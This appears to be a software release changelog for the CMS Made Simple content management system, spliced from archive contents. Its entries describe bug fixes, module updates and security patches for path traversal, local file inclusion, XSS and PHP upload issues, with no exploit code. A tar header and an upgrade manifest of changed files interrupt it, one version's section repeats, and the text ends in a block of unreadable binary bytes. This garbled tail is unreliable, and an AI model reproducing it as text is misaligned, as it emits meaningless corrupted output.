  - Adds a StartsWith JavaScript shiv for IE11.
  - Revert the protocol-less URI for root_url (more changes coming for 2.3).
  - Get rid of the smart_url config option.
  - Fix a problem when testing for duplicate aliases of the form string-###  where the suffix integer was greater than 100.
  - More fixes to mact preprocessing if {content} was in the top of the template.
  - Minor fix to ExpandXMLPackage to not throw an exception in brief mode if module is not compatible with the current version of CMSMS.
  - adds new cms_entities_array function in misc to convert an array recursively to values.
  - Fixes transposed arguments in UserOperations::AddMemberGroup().
  - Better detection of duplicate content blocks.
  - Revert template_stack change to Smarty_CMS from 2.2.2.
  - Improvements to HookManager.

CmsJobManager v0.1.1
  - Optimization of audit logging.
  - Change connection timeout to 1 second.
  - Change processing to be a little more friendly to some environments wrt. content-size header.
  - Prevent processing from the CLI when root_url is calculated.

MicroTiny v2.2.1
  - Minor fix for filepicker plugin.

News v2.51.3
  - For security, no longer urldecode the detailtemplate parameter in detail view.
    This may have some implications for people that are specifying the detailtemplate parameter (with a template with special characters) from within a WYSIWYG (which is not recommended behavior).
  - Convert title and dropdown options and text fields to entities before display.

ModuleManager v2.1.2
  - Now sort modules in the installed tab a bit better.
  - Now handle module 'not available' a bit better.

FileManager v1.6.4
  - Add a different icon for navigating up one level.
  - No longer allow uploading any php (or derivative) file.
  - No longer allow renaming any file to have a .php extension (or a derivative).
  - Fixes an issue when improper/invalid values for root path and uploads path are manually specified in the config.php

FilePicker v1.0.1
  - No longer allow overriding the filepicker type on the URL.
  - No longer allow uploading any .php files.

CMSContentmanager v1.1.6
  - Now double check that the 'default parent' for new pages actually exists.

Navigator v1.0.8
  - Minor english documentation correction.

Installation Assistant v1.3.3
  - Now look for lib/include.php before include.php in step 8 and step 9 when connecting to CMSMS.
  - Fixes to upgrade routine for 2.1.5 wrt. the 'Manage Stylesheets' permission (ignore an exception).


Version 2.2.2 - Hearts Content
----------------------------------
Core - General
 - Additional security improvement in CMSModule::GetTemplateResource().
 - Now Smarty_CMS is no longer derived from SmartyBC (uses our own wrapper class) which prevents all occurrences of {php} tags from running.
 - Adds an admin directory .htaccess file to explicitly disable browser caching of any resources.
 - Fixes a relative path vulnerability in module_file_tpl resource.
 - Fixes a path building issue in CmsModuleInfo.
 - Fixes to parsing and generating moduleinfo.ini files.
 - Disallow any resource specifications with a * or a /.
     * This also means that no file resource specifications with path information will be permitted.
 - Move mact preprocessing to AFTER the template_top has been processed. So order of processing (for module actions on the frontend is)
     a:  template top
     b:  mact preprocessing (if enabled, which is the default)
     c:  template body
     d:  template head
 - Fix sureGetNodeByAlias to check if the input is numeric. If it is, assume that it is a page id, not an alias.
 - Fix alias generation in the ContentBase class to check if the input page title is numeric... If it is, prepend a character to it to ensure that integer casting will return 0.
 - Fix listtags to show tags using smarty_nocache_ function name prefix.
 - Improvements to the {form_start} plugin.
 - Fix silly, old issue in recursive_delete function.
 - Clean up more parameters from the content tag before passing to module action.
 - Fix local file inclusion vulnerability in listtags.
 - Now call get_userid() in debug_to_log instead of check_login()

AdminSearch v1.0.3
 - Now search the metadata field of content pages.
 - Fixes for single quotes in search results.

DesignManager v1.1.3
 - Set title attribute tags for edit/create template, stylesheet, design.
 - Remove debug statements.

MicroTiny v2.2
 - Upgrade tinymce to v4.6.x.
 - Adds new tabfocus and hr plugins.

News v2.51.2
 - Fixes so that all cancel buttons work properly on new News articles.

Navigator v1.0.7
 - Adds a silly __get() method to the NavigatorNode class squash some notifications in the error logs.

ModuleManager v2.1.1
 - Now handlle remote module installs upgrades, and activates via a 2 request process to allow new module versions to be read into memory.

Installation Assistant v1.3.2
 - Correction to assets warning

Search v1.51.2
 - Now do an html entity decode on all content added to AddWords.


Version 2.2.1 - Hearts Desire
----------------------------------
Core - General
 - Improve the Smarty plugin loading to handle non-cachable plugins in the /assets/plugins and /plugins directories.
 - Fixes to transaction functions in database abstraction library.
 - Fix CMSModule::GetTemplateResource to no longer accept eval or string resources.
 - Fix CMSSmartySecurityPolicy so that debug_to_log is no longer an allowed function.

   Many thanks to Daniel Le Gall from SCRT SA, Switzerland for reporting the vulnerabilities.

Installation Assistant v1.3.1
 - On upgrade to 2.2.1 move all files from /plugins to /assets/plugins (they should only be third party plugins at this point).
 - On upgrade chmod the config.php to 444.

MicroTiny v2.1.1
 - Fix temporary JS call URL.

News v2.51.1
 - Fix frontend pagination.


Version 2.2 - Canada
----------------------------------
Core - General
  - Automatically turn on file locking for cached files to attempt to mitigate race conditions.
    NOTE:  On systems using archaic filesystems such as FAT and FAT32 CMSMS may no longer operate.
  - cms_filecache_driver now caches for 2 hours by default and has an improved cooperative locking test
  - Implement new database abstraction library that is compatible with (functionality wise) but improves upon adodb-lite.
  - Implement protocol-less URL's in the config.
  - Page tabs are now focusable (you can tab through page tabs and use enter to select one).
  - Minor fix to the {form_start} plugin.
  - Minor change to the {admin_icon} plugin (default image class).
  - Cache more items that are queried from the database, to reduce mysql load.
  - Minor change to tree operations functionality to reduce memory usage.
  - Fixed problem with order of content blocks when using {content_module} stuff.
  - Adds get_usage_string and the concept of a type assistant to template types.
  - Minor change to auto-alias determination routine.
  - Detect module_custom enhancements in the CmsModuleInfo stuff.
  - Refactor Admin authentication.
  - More fixes to the cms_url class.
  - Optimize the include.php file.
  - Adds built-in asynchronous task processing system.
  - Adds the ability to reduce redundant mentions in the Admin log (runs asynchronously).
  - Refactor the Admin log page to allow for better filtering and pagination.
  - Admin log now uses cms_date_format and cleans output.
  - Notification functions in the CmsAdminThemeBase function are now just stubs and do nothing. Will be removed at a later date.
  - Removed the GetNotificationOutput() method from the module API.
  - Adds classes for creating Alerts. This is much more advanced than the old Notifications system.
  - Minor accessibility tweaks to the OneEleven theme.
  - Fix numerous minor problems with the OneEleven theme.
  - Refactored the OneEleven Admin theme to use new Alerts classes instead of old Notifications.
  - Refactor the OneEleven Admin theme to display an alert icon in the shortcut bar, instead of in the navigation area.
  - Fixed sidenav in the one OneEleven theme now works properly. If sidenav is larger than viewport then don't use fixed... easy.
  - In OneEleven Now revert to small sidebar navigation (still floating) if screen is too narrow.
  - Removed notification settings from MyAccount and Global Settings.
  - Removed pseudocron granularity preferences.
  - cms_alert() and the new cms_confirm() JavaScript functions now return promises.
  - Revises much code to use cms_alert and cms_confirm() instead of the standard, but browser specific functions.
  - Fixes to the cache clearing methodology.
  - No longer check for duplicate content blocks in templates... NEEDS TESTING
  - New core events: ContentPreRender, LostPassword, LostPasswordReset, StylesheetPostRender.
  - Fix problem with the default parameter to the {content} tag.
  - Fix problem with the use_smartycache thing in system information.
  - Fix notice in useroperations.
  - Fixes problems where all files (including dot files) had to be writable before creating a module XML file.
  - Fixes minor notice in user operations.
  - Fixes for namespaced modules.
  - Fixes an issue in CmsLayoutTemplate when creating a template from a type.
  - Fixes an issue where a 404 handler error page would not be rendered correctly if for some reason the route did not specify a page id to load.
  - More fixes to cms_url class.
  - Numerous minor optimizations.
  - Add to content types the ability to set basic attributes for properties from within the page type definition.
  - Fixes problems with pagelink and link content types not being properly editable by additional editors.
  - Adds more type and content cleaning into the content types FillParams method(s).
  - Pass an explicit cacheid in to createtemplate in index.php.
  - Fix an error message in the autorefresh JavaScript class.
  - Fix problems that could result in uid=1 becoming inactive, and not a member of other groups when edited by another user.
  - Fix query problem in CmsLayoutStylesheetQuery with Mysql 5.7.
  - The {content} tag now supports passing data attributes to the generated textarea, for use by syntax highlighter and WYSIWYG modules. i.e: {content data-foo="bar"}.
  - Refactoring of the Admin login code to be cleaner, more efficient, more secure.
  - No longer allow any modules to auto-upgrade on frontend requests.
  - Fix problem with cms_filecache_driver::clear().
  - Introduces the new Hook mechanism to allow optimizing cms_stylesheet a bit further. All core SendEvent calls are now implemented as hooks.
  - changegroupperms can now localize permission names,  and add an info string for each permission. (the listpermissions hook).
  - Adds add_headtext(), get_headtext(),  add_footertext(), get_footertext() methods to the Admin theme class.
  - minor refactoring of admin/index.php, admin/header.php, admin/footer.php and admin/moduleinterface.php.
  - now use hooks so that loaded modules can now add text to the head area of any Admin page output.
  - Change the help for the basic attributes.
  - Adds new 'switch user' functionality for members of the Admin group.
  - Re-factor the content page selector ... now supports two modes (one for a simple list, and the previous dynamic one that is faster for large sites)
    the simple list mode is used for users with limited edit capabilities on pages.
  - Adds a new Smarty plugin {page_selector} to the Admin lib.
  - New arguments to the CreateHierarchyDropdown function (deprecated) and adjust documentation.
  - Content pages now have the ability to control whether or not the page wants any more children.
  - The TemplateType class now has a help callback to optionally allow retrieving help for templates of a particular type.
  - Permissions are now grouped logically by module/originator in ChangeGroupPermissions.
  - Now use HTTPS for the latest version check.
  - Adds the public_cache_url config entry,  and make sure that the css_url uses that by default.
  - Adds many core hooks.
  - Enhance the {page_image} plugin to optionally output a full HTML img tag if there is a value for the respective property.
  - Improve the {content_image} plugin to output nothing if there is no value for the property, and to output any non-internal arguments as attributes to the HTML img tag.
  - Upgrade to an un-modified version of smarty v3.1.31.
  - Move plugins directory to lib/plugins since we now have the assets/plugins directory for custom plugins.  Upgrading should preserve any custom plugins in the /plugins directory.
  - Add new plugins {thumbnail_url}, {file_url} and {cms_filepicker).
  - Add more intelligence to the tableoption handling for DataDictionary::CreateTableSQL.
  - Minor improvements to the asynchronous behaviour of the locking functionality.
  - #11295 - Cannot change the name of a UDT, always creates new UDT.
  - #11080 - Parameter $adding in GetContentBlockFieldInput always FALSE.
  - #11093 - Bad error message in jquery.cmsms_autorefresh.js.
  - #11133 - is_email() fails on domain check.
  - #11235 - munge_string_to_url leaves trailing dashes at the end of munged URL.
  - #11287 - Password reset form's password fields have different lengths.
  - Fix issue with module actions if 'content_en' block name was given on the default content block.
  - Better security when saving content pages.  Most primary fields are cast to their appropriate data type (int, bool, etc).  MenuText, and TitleAttribute can no longer contain html tags like <strong>foo</strong>.
  - Fixes issue with entities in redirecting links
  - The href/page argument to {cms_selflink} is now decoded before resolving to a page id.

Navigator v1.0.5
  - Minor optimizations.
  - Now use pageid in calculations of cacheid.
  - Now output template help to Navigator.

Installation Assistant v1.3
  - Only create dummy index.html files in subdirectories we created.
  - Clear cache after step 9.
  - Upgrade routine now asks for, and tests database credentials.
  - Upgrade routine now rewrites the config.php file (but keeps a backup).
  - Set a few more preferences to reasonable defaults on install. Specifically related to site cleanup and performance.
  - On installation, now insure that tmp/cache and tmp/templates_c directories are empty.
  - Now displays if files are going to be skipped.
  - Adds clear option for development purposes.
  - No longer ask to save database password.
  - On install now create the assets directory structure.
  - On upgrade (for 2.2) now create the assets directory structure and move tmp/configs, tmp/templates, module_custom, admin/custom, etc. within it.
  - When using the expanded installer allow changing the destination directory on step 1.
  - Check for existing files in the installation directory for new installations.
  - Added more notes to aide in diagnosing white screens
  - Modify package .zip files so that extracted files will usually have 644 permission (depends on the unzip routine used).

CmsJobManager
  - New core module to handle queued asynchronous tasks.

Content Manager
  - Minor tweak to bulk delete pages.
  - Minor fix to the active tab when changing a template or design.
  - Now listen to the 'default parent page' user preference.
  - Fix minor XSS problem in the Admin if some loser puts JavaScript into the title field or alias field or menu text field.
  - Now allow filtering pages by owner, editor, template, or design.  Only for Administrators with Modify any page, or Manage all content permissions.
  - Fix problems with auto-refresh being too fast for some operations.
  - Now auto scroll to the first matched page in a find.
  - Additional editors of a page cannot change the content type. Only owners, or users with the Manage all Content permissions.
  - Fix a problem with the call to GetTabElements.

DesignManager
  - Move the designs tab of the main interface into third position.
  - Implement sorting in edit design.
  - Remove option menus (for now) from templates, stylesheets, and designs tab.
  - Modify the template list functionality in edit-design to allow using keyboard control. Space or + to select an item on the left, and right arrow to move.
  - Modify the edit-design functionality to allow clicking on an attached template or stylesheet to edit it.
  - Generic templates now display a usage string.
  - When creating a new template, associate the new template with the default design.
  - Add reset buttons to the filter forms.
  - No longer check for default content block in a template.
  - Adds the ability to export a template to a file within the assets directory, and to import from the assets directory.
  - If a file exists in the assets/templates directory corresponding to a template name, do not allow in-browser editing.
  - Add bulk actions to allow importing and exporting multiple templates.
  - In the template list, if a file exists for a template... display it in the filename column.
  - Adds the ability to export a stylesheet to a file within the assets directory, and to import from the assets directory.
  - If a file exists in the assets/css directory corresponding to a stylesheet name, do not allow in-browser editing.
  - Add bulk actions to allow importing and exporting multiple stylesheets.
  - In the stylesheet list, if a file exists for a stylesheet display it in the filename column.

News v2.51
  - Minor fix to add category.
  - Removes GetNotificationOutput method.
  - Add a task that runs at least every 15 minutes to detect draft articles... create an alert for this.
  - Add an option to never create alerts about draft News articles.
  - Minor optimizations.
  - Adds postdate as parameters in events.
  - now output template help to Navigator.
  - Adds new 'linked file' type field that allows selecting a file using the filepicker.
  - Changes the default summary and detail templates to support the linked_file field type, and uses {thumbnail_url} and {file_url}.

FileManager v1.6.3
  - Move settings to it's own menu item under Site Admin.
  - Fix minor problem with moving a directory.
  - Minor fix to move file functionality.
  - Adds OnFileDeleted event.
  - Adds 'view raw file' icon in each viewable row.
  - Minor formatting changes in file list.
  - Now display clickable path entries for easier navigation.

Search
  - Convert to store all data using the InnoDB engine.
  - Use transactions for the addwords and deletewords stuff for performance.
  - Fix problem with query and record expiry.

AdminSearch v1.0.3
  - Fixes problem with use of 'Use Admin Search' permission.
  - Now searches for matching strings within templates and stylesheets that are stored as files.
  - Now listens to the HasSearchableContent metod when searching content pages.

ModuleManager
  - Now detect if module_custom directories exist and are populated and warn about this before upgrading a module.
  - Minor string changes.
  - Improvements to error handling in the new versions tab.
  - Write a confirmation form for uninstalling a module that displays the UninstallPreMessage or uses a default.
  - Now don't allow disabling / uninstalling myself.
  - Don't hide the upgrades tab when there are no upgrades, but show the number of upgrades in the tab title instead.
  - Now use HTTPS for requests to ModuleRepository.
  - Trigger a hook before exporting a module to XML.

MicroTiny v2.1
  - New version of the tinymce wysiwyg editor.
  - Adds a mailto plugin.
  - Now use the FilePicker module for a filepicker, required rewriting the cmsms_filepicker tinymce plugin.
  - Enable the title attribute on the image plugin.
  - Now uses PUBLIC_CACHE_LOCATION for cache files instead of hardcoding tmp/cache


Version 2.1.6 - Spanish Wells
----------------------------------
Core - General
  - Now attempt to detect if a template name passed into CmsModule::GetTemplateResource() is already a resource string.
  - endswith is now an accepted function in Smarty templates (fixes typo in security policy).
  - Fixes for CmsNlsOperations when using a language detector.
  - Fixes warnings in useroperations.
  - Fixes problem with cms_selflink dir='up' since 2013.
  - Modifies the OneEleven theme to set the meta referrer attribute for security purposes.
  - Modifies the functionality of the CSRF tokens to be more secure (only set the cookie in one location, only set the session variable from the cookie).
  - Increase Admin users list limit.
  - Reduce time limit for daily version check to 3 seconds.
  - cleanValues in Admin log and List Content.
  - Minor fix to the relative_time plugin.
  - Admin menu item URLs can now be built from the remaining members of the object, if not specified.
  - {content_image} and {content_module} now preserve order properly and support the priority attribute.

  - #11198 - Fixes problem with cms_selflink with aliases that starts with a numeric sign.

Content Manager v1.1.4
  - Fix bulk set-non-cachable functionality.
  - Fix a bug wrt content blocks and the adding flag.

Installation Assistant v1.0.4
  - Adds recommended check for ZipArchive.
  - Improves method of determining a temp directory.

ModuleManager v2.0.5
  - Improves functionality if ModuleRepository is not available.

News v2.50.6
  - Minor fix to editing news articles from the Admin interface.


Version 2.1.5 - High Rock
----------------------------------
Core - General
  - Fix fatal error if an extcss stylesheet was placed in the Admin theme.
  - Another minor fix to clearing cached files.
  - Fixes problems where all files (including dot files) had to be writable before creating a module XML file.
  - Fixes minor notice in user operations.
  - Fixes for namespaced modules.
  - Fixes an issue in CmsLayoutTemplate when creating a template from a type.
  - Fixes an issue where a 404 handler error page would not be rendered correctly if for some reason the route did not specify a page id to load.
  - More fixes to cms_url class.
  - Improve the way page aliases are munged when they are supplied.
  - Improve the error generated when a page alias cannot be generated.
  - Minor fixes to the form_start plugin.
  - Minor fixes to generation of moduleinfo.ini.
  - Fix an error message in the autorefresh JavaScript class.
  - Fix problems that could result in uid=1 becoming inactive, and not a member of other groups when edited by another user.
  - Fix query problem in CmsLayoutStylesheetQuery with Mysql 5.7.

  - #11080 - Parameter $adding in GetContentBlockFieldInput always FALSE.
  - #11093 - Bad error message in jquery.cmsms_autorefresh.js.

Content Manager
  - Improve error handling in Edit Content.
  - Fix a problem with the call to GetTabElements.

Design Manager
  - Fix problem with resetting a template back to factory defaults, or creating a new template from factory defaults.

Module Manager
  - Improve the way modules with dependencies are installed and upgraded. (Got rid of the queue stuff).

AdminSearch
  - Use 'Manage Stylesheets' permission, not 'Modify Stylesheets' when searching stylesheets.

Phar Installer
  - Adds missing 'Manage Stylesheets' permission that would not be created on upgrade from 1.12.



Version 2.1.4 - Freetown
----------------------------------
Core - General
  - Fix to the clear_cached_file() method which should fix problems with module installation.
  - Minor tweak to distributed sample htaccess.txt file.

Phar Installer
  - Fixes issues with respect to hanging on step 7 when suhosin PHP addon was installed.
  - Minor PHP7 Fixes.

Module Manager
  - Fixes problems where all files (including dot files) had to be writable before creating a module XML file.


Version 2.1.3 - Black Point
----------------------------------
Core - General
  - Security fix to prevent HTTP_HOST attacks. Many thanks to I-TRACING (www.i-tracing.com) for reporting it!!
  - Remove stub .htaccess files from subdirectories.
  - Update the included sample htaccess.txt file for security.
  - Fix for endless loop when calculating a page alias in utf-8 environments.
  - Fix for endless loop when calculating a page alias and a page name/title ended with -
  - Fixes a notice on the login page.
  - Optimize LoadContentFromId() to be typesafe, and use default page, if the id passed in is invalid.
  - Fix error condition if there were no default default design, or default page template.
  - Fix problem with system verification.

  - #10825 - Admin-account settings don't remember startpage if you set one
  - #10874 - When creating a page and the title has specific characters, CMSMS stops responding
  - #10910 - content and content_module order incorrect Admin page
  - #10911 - 'Use Admin Search' permission not being used in 2.1.2
  - #10921 - Content Field to Display in Name Column not used

AdminSearch v1.0.1
  - Minor fix to permissions checks.

Navigator v1.0.3
  - Improved exception handling on install

News v2.50.5
  - Fix error condition if no results were returned.

Installation Assistant v1.0.3.1
  - Tweaks to README files.
  - Improved error handling in some circumstances.
  - Fix some PHP7 issues.

FileManager
  - #10871 - Filemanager moving folder


Version 2.1.2 - Andros Town
----------------------------------
Core - General
- Minor fix to missing language string stuff
- Fixes to home page preferences
- API documentation fixes (minor)
- Fixes for ajax_content (the Ajax routine behind the parent selector in edit content) to handle ordering inconsistencies
- Remove die statement in is_email
- Minor fix to the relative_time modifier
- Upgrade CMSMailer to 6.2.14
- Now do a check for E_ALL in the system info

News v2.50.4
- Now all field definitions can be deleted
- Minor fix to default action if no results were returned...

ModuleManager v2.0.2
- Revamp module dependency calculations when installing a module
- Minor fix for some notices in install and upgrade modules
- Minor typo fixes
- Minor fixes for PHP7

MenuManager  v1.50.2
- make sure that uninstall cleans up properly

MicroTiny v2.0.3
- minor template fix
- fixes for stylesheet overrides


Version 2.1.1 - Nicholls Town
----------------------------------
Core - General
- Fix the template compiler so that content blocks can be placed within sub templates and detected with the {include} tag
- Fix minor problem with checksum verification
- Fix to the cms_cache_handler class
- Minor fix to SetAllPageHierarchies()
- Correct location where session was started in frontend displays
- Fix the default option for {content_image}
- Modify the locker to use a beacon if supported, when unlocking
- Fix missing permissions when a 1.12 site was upgraded (installation assistant)

CMSContentmanager v1.1
- Minor template changes in edit content wrt. locking
- Adds ability to clear content locks (Admins can clear all locks, regular users can only clear their locks)
- Enhancements to the action to bulk set designs to show only page templates by default, but to optionally show more

DesignManager v1.1.1
- Minor template changes in edit content wrt. locking
- Adds ability to clear template and CSS locks (Admins can clear all locks, regular users can only clear their locks)


Version 2.1 - Bahamas
----------------------------------
Core - General
- Minor performance tweaks to sample htaccess.txt
- Minor fix to the ProcessTemplateFromDatabase module API method.
- Improvements and re-factor the way headers are sent wrt caching
- Add a new method to the ModuleOperations class to allow a module to be within a namespace.
- Enhances the Group class.
- Enhancements and fixes to the cms_url class.
- Modified the $mod->smarty reference to be smarter... it is now deprecated.
- Fixes issue with https requests (#10697)
- Modifies The CmsLayoutTemplate class and CmsLayoutTemplateQuery to allow filtering on listable or non listable
  or setting a template as listable (default) or non listable
- Fixes a problem with styling of the login form if tasks must be run AND a module needs upgrading.
- Fixes to the cloning of templates in CmsLayoutTemplate
- Fixes problem with SetAllHierarchyPositions that cleared the entire cache instead of only the necessary part of it.
- Adds the unloadCancel handler to the lockManager jQuery plugin.
- Moves version.php and include.php inside the lib directory so that they are easier to protect from unwanted direct access.
- Fixes to page alias tests when manually entering a page alias.
- Missing language strings are no longer output to Admin log, but to the debug log.
- Requests for modules that are not installed/enabled, or for invalid actions will now result in 404 errors.
- Fixed problem where restricted content editors could implicitly change the page alias.
- Improvements to the system information page, particularly the bbcode output.
- cms_init_editor, form_start, and cms_action_url plugins are no longer cachable.
- Adds the 'adminonly' option to the {content}, {content_image}, and {content_module} tags to allow only members of the 'Admin' group to manipulate the values of that block.
- Add a trivial check to the sitedown message to make sure that it is not empty.
- Minor fixes for PHP 7

MicroTiny v2.0.2
- Now add page hierarchy to autocomplete text when using the linker.
- Now use $smarty->CreateTemplate for clarity when compling the config template
- Now explicitly assign urls so that they do not get caced by smarty.
- Slightly tweak the default HTML content in the example tab.
- Updated tinymce to the latest 4.2.7 version, included the 'paste' plugin, and turned on 'paste_as_text'.
- Added the ability to enable the table plugin, now distribute the table plugin

CMSContentManager v1.0.2
- Fix problem with pagedefault metadata.
- Fixes for handling no listable templates for a design
- More work with locking.  With only one exception all locking and unlocking is initiated via javascript.
- Minor fix to copycontent

DesignManager v1.1
- Adds ability to toggle the listability of a template.
- Fixes problems with lost changes if there is a syntax error in the template.
- More work with locking.  With only one exception all locking and unlocking is initiated via JavaScript.

News v2.50.3
- Fixes minor issue with pagination in News Admin console.
- Fix errors in the default form template.
- Fixed URL to long issues on redirection after adding/editing article.

Search v1.50.2
- Minor PHP7 fixes.

ModuleManager 2.0.1
- Minor fix to which modules could be uninstalled and deactivated.


Version 2.0.1.1 - Adelaide
----------------------------------
Fix to the $this->smarty magic method in the module class to resolve to the action template or the global Smarty.


Version 2.0.1 - Adelaide
----------------------------------
Core - General
- Improved optimization in ContentOperations::SetAllHierarchyPositions.
- Fixed return type of ContentOperations::GetPageIdFromAlias().
- Help for the {cms_html_options} plugin.
- Change the default page template to use {Navigator}.
- Explicitly force $smarty->fetch() to create a new template, and therefore a new scope. Keep track of scopes in a stack.
- Change prototype to CMSModule::DoActionBase to pass in the current template object.
- SITENAME is now assigned as a Smarty global.
  (fixes some variable scope issues)
- Fix problem with changing content types.
- Fix problem with CmsLayoutTemplateQuery wrt the editable option, that generated an SQL error.
  (resolves problems where people have additional editor access to templates, but no other design manager permissions).
- Fix minor JavaScript errors in plugin (error checking).
- Fix problems where If assign was passed to a {content} tag, do not pass it to the module on a mact request.
- Implements the completely forgotten 403 exception stuff and the IsPermitted content method.
- Improve the cmsms_dirtyform jQuery plugin to support the unload handler and an onUnload callback.
- Fixed the jQuery page selector plugin when the current value points to an invalid page,  and fixes for asynchronous Ajax.
- Adds a globally available cms_busy() JavaScript function for the Admin.
- Fix problem with html entitites in email addresses in user settings.
- Fix problem with {content cssname=string} and quotes.
- Changed cmsms plugins to use $smarty->getTemplateVars() instead of $smarty->get_template_vars() because of scope issues.
- Minor fix to {form_start} when not used in a module.
- Improved error handling for cms_stylesheet.  Now will generate a message in the Admin log, and an html comment on error.

CMSContentManager v1.0.1
- Fixes for changing content types.
- Adds a title for some contextual help if a template is not available for a content item.
- Clear any locks if an exception occurred while submitting a content item.
- Improvements to error handling with apply and preview.
- Content list now refreshes every 30 seconds to display up-to-date lock information.

DesignManager v1.0.1
- Clear the type_default flag when copying a template.
- Clear any locks if an exception occurred while submitting a template.
- Clear any locks if an exception occurred while submitting a stylesheet.
- Template and stylesheet lists now refresh every 30 seconds to display up-to-date lock information.
- Fixes for design exporting templates with protocol-less URLs in them.

MenuManager v1.50.1
- Changes to createSmartyTemplate calls (now use $smarty->get_template_parent()).

Navigator v1.0.1
- Changes to createSmartyTemplate calls (now use $smarty->get_template_parent()).
- Minor change to the help ($node->children_exist)

Search v1.50.1
- Changes to createSmartyTemplate calls (now use $smarty->get_template_parent()).

News v2.50.1
- Changes to createSmartyTemplate calls (now use $smarty->get_template_parent()).
- Fix problem with custom fields not being assigned in fesubmit.
- Fix minor problem with html entities in the detail template parameter.

FileManager v1.5.1
- Fix minor problem with Smarty scope in the drop zone.


Version 2.0 - Australia
----------------------------------
+++ Initial Release +++
MANIFEST.DAT000066600000003672145313737210006326 0ustar00MANIFEST GENERATED: 1701181392
MANIFEST FROM VERSION: 2.2.18
MANIFEST FROM NAME: Apex
MANIFEST TO VERSION: 2.2.19
MANIFEST TO NAME: Selkirk
CHANGED :: a0bc9ded381ec44baf4b46dfad11d093 :: admin\ajax_content.php
CHANGED :: 60c75aa82209bd6551cf231b5c7a75b4 :: admin\plugins\function.page_selector.php
CHANGED :: 72051f94fb96ffec06b5183115e4842b :: doc\CHANGELOG.txt
CHANGED :: fa6d90edc84b40b08deb73099afa4322 :: index.php
CHANGED :: cbdb49127029829b58dcc5bb0a7756fd :: lib\classes\class.CmsApp.php
CHANGED :: 165790be607b8194a1d11702ceea886b :: lib\classes\class.CmsLayoutTemplate.php
CHANGED :: d3eb3d8bd62581c0440196d9c4c3066a :: lib\classes\class.cms_config.php
CHANGED :: 6a1611748af4d21a98702379bd77996b :: lib\html_entity_decode_php4.php
CHANGED :: 66c15800557bc50aafe914311c883039 :: lib\include.php
CHANGED :: 4d75c4f765998bfebc26f3a713967dd3 :: lib\jquery\js\jquery.cmsms_hierselector.js
CHANGED :: 4efa950ec4122380e8e3f01e8dec15a8 :: lib\page.functions.php
CHANGED :: 4bc63498f99102374d0d626ef87d1c9c :: lib\version.php
CHANGED :: 944ad2fd8f6f7f301eb5af3803ae5982 :: modules\CMSContentManager\action.admin_editcontent.php
CHANGED :: 9c35145e22e1a12b65a0ae6377557b0c :: modules\CMSContentManager\CMSContentManager.module.php
CHANGED :: cccce3db760f901e581a46f1502ae68a :: modules\CMSContentManager\lang\en_US.php
CHANGED :: 1ddad7f45f01493391bcc6bc59f1f7dd :: modules\CMSContentManager\templates\admin_editcontent.tpl
CHANGED :: 86a60f85dabe03aa765b6c576ec7ede7 :: modules\FileManager\FileManager.module.php
CHANGED :: daeb4dc8bdaadca8afecc32183d19167 :: modules\FileManager\lib\class.jquery_upload_handler.php
CHANGED :: b02cb48e6ce8637c6382a47a2f716804 :: modules\FilePicker\FilePicker.module.php
CHANGED :: 5aa72c126dfdbd6c6de6771e9715e358 :: modules\FilePicker\lib\class.jquery_upload_handler.php
CHANGED :: b197448bcddaf3c9deace9b88e250505 :: modules\Navigator\action.default.php
CHANGED :: af6816894f11cfa5ccb80c73720f6629 :: modules\Navigator\Navigator.module.php
Version 2.2.2 - Hearts Content
----------------------------------
Core - General
 - Additional security improvement in CMSModule::GetTemplateResource().
 - Now Smarty_CMS is no longer derived from SmartyBC (uses our own wrapper class) which prevents all occurrences of {php} tags from running.
 - Adds an admin directory .htaccess file to explicitly disable browser caching of any resources.
 - Fixes a relative path vulnerability in module_file_tpl resource.
 - Fixes a path building issue in CmsModuleInfo.
 - Fixes to parsing and generating moduleinfo.ini files.
 - Disallow any resource specifications with a * or a /.
     * This also means that no file resource specifications with path information will be permitted.
 - Move mact preprocessing to AFTER the template_top has been processed.  So order of processing (for module actions on the frontend is)
     a:  template top
     b:  mact preprocessing (if enabled, which is the default)
     c:  template body
     d:  template head
 - Fix sureGetNodeByAlias to check if the input is numeric. If it is, assume that it is a page id, not an alias.
 - Fix alias generation in the ContentBase class to check if the input page title is numeric... If it is, prepend a character to it to ensure that integer casting will return 0.
 - Fix listtags to show tags using smarty_nocache_  function name prefix.
 - Improvements to the {form_start} plugin.
 - Fix silly, old issue in recursive_delete function.
 - Clean up more parameters from the content tag before passing to module action.
 - Fix local file inclusion vulnerability in listtags.
 - now call get_userid() in debug_to_log instead of check_login()

AdminSearch v1.0.3
 - Now search the metadata field of content pages.
 - Fixes for single quotes in search results.

DesignManager v1.1.3
 - Set title attribute tags for edit/create template, stylesheet, design.
 - Remove debug statements.

MicroTiny v2.2
 - Upgrade tinymce to v4.6.x.
 - Adds new tabfocus and hr plugins.

News v2.51.2
 - Fixes so that all cancel buttons work properly on new news articles.

Navigator v1.0.7
 - Adds a silly __get() method to the NavigatorNode class squash some notifications in the error logs.

ModuleManager v2.1.1
 - Now handlle remote module installs upgrades, and activates via a 2 request process to allow new module versions to be read into memory.

Installation Assistant v1.3.2
 - Correction to assets warning

Search v1.51.2
 - Now do an html entity decode on all content added to AddWords.
��[[wSG�~�_�8�K� �J 3@�5/ZU�ն�,yI2	���׶��Nؙٲ��R�]z�^>~��go�>x��ճ׏�>{��j���R�����߽���>{���O��y���v���/�}���o:�}w���o����|�Y�u����g?>�|�̓`$[cpRB�*�b�1�ܳs�w]l��Jw�^.e�y�\x�Z�_v��x}!��ruu�\����j'[��^���a�l+�j�ư3Ak1�֢�KpY�l��GW��\mn�l�Χ��b����X-���|F��蒢�
u��8nb�=��	�ʼ����^���Zs:�z��F�[mb��Q��cMTl������f�ds����}Jx��TL�qeM$�v�&V���^$�KqI��Wۨ�dG��V��=ZB���K�]�ƚ~��^�H�ڜ��!���|�ή��J�X���$��4ږ�_�m92}���ݯ��ldӵ�`�@�P�kA�C'n�g�}�%�Nvޡ��hM�I��n#��@!��:�zX4���I�7&H����L A9���L��M�jS��Gq��H�a?{зx�)�n}�4/���k��|{�H��8�)��aS�����)�$����W��M�#��IXѩ%��-DH����3w���t��
�&�Q���V���w��r`��٥4���j�����c�#�#N����]4�T��%Q6���f��F����϶���K��S��ќ�9�d�RP��P�O}�)��?��C�z�v�Za-7G����.$�m��ga��`k���_��$��}�'�@�%<�B�@�����s����=ݮo���U�Q��V����^�b�-$q��XK5��d���������O�N�E�3!Z�p�Ф츫��x0^os���$�	)e�2x�>R
��J�\�|6��FA�D���6�!�o��1�
